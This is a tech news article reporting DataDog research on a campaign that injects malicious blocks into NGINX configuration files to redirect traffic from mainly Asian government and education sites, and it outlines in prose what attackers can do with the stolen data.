NGINX servers hijacked in global campaign to redirect traffic

News
By published

Redirected traffic can be abused in multiple ways, experts warn

A close-up of an interent search bar with 'http://ww' visible
(Image credit: Getty Images)
  • DataDog reports attackers hijacking NGINX configurations to reroute traffic through malicious infrastructure
  • Campaign targets Asian government and education sectors, enabling theft of session tokens, cookies, and credentials
  • Hijacked traffic used for phishing, malware injection, ad fraud, and proxying further attacks

Cybercriminals are targeting NGINX servers, rerouting legitimate traffic through their malicious infrastructure, experts have warned.

Security researchers at DataDog Security Labs found the attackers are focused primarily on Asian targets in the government and education industries.

NGINX servers are software systems that sit in front of websites or apps and handle incoming web traffic. They serve content, balance loads, and route requests to the appropriate backend servers.

What to do with the stolen data

In the attack, the unnamed threat actors modify the NGINX configuration files and inject malicious blocks that grab incoming requests. They then rewrite them to include the original URL and forward traffic to domains under their control. As per DataDog, this is a five-stage attack that starts with a configuration injection and ends with data exfiltration.

Since no vulnerability is being abused here, and the victims still end up on the pages they asked for, none is the wiser. Still, cybercriminals are getting away with valuable information that can be used in different ways.

Because headers are preserved, the attacker can collect IP addresses, user agents, referrers, session tokens, cookies, and sometimes credentials or API keys if they appear in requests. On government or .edu sites, that data is especially valuable.

They can also manipulate content, selectively. Since only certain URL paths are hijacked, the attacker can inject ads, phishing pages, malware downloads, or fake login prompts only when they want, successfully targeting specific users, regions, or time zones.

Then, there is the option of traffic monetization and resale. Clean, real user traffic routed through attacker infrastructure can be sold for ad fraud, SEO manipulation, click-fraud, or used to boost other malicious services, which is a common practice in large-scale proxy ecosystems.

Finally, compromised NGINX servers can be used to proxy attacks against other targets, effectively masking their origins.

Via BleepingComputer

Best antivirus software header
The best antivirus for all budgets

➡️ Read our full guide to the best antivirus
1. Best overall:
Bitdefender Total Security
2. Best for families:
Norton 360 with LifeLock
3. Best for mobile:
McAfee Mobile Security

Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the Follow button!

And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form, and get regular updates from us on WhatsApp too.

Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.